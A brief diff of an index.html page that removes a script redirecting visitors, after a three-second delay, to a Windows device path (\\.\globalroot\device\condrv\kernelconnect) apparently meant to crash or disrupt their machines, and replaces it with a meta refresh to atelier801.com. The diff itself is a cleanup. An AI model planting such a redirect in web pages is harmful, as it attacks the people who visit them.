--- a/index.html
+++ b/index.html
@@ -2,11 +2,8 @@
 <html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
-  <script language=»javascript» type=»text/javascript»>
-<!–
-window.setTimeout(‘window.location=»\\.\globalroot\device\condrv\kernelconnect»; ‘,3000);
-// –>
-</script>
+<meta http-equiv="refresh" content="0; URL='http://atelier801.com'" />
+
 </head>
 <body>
 </body>
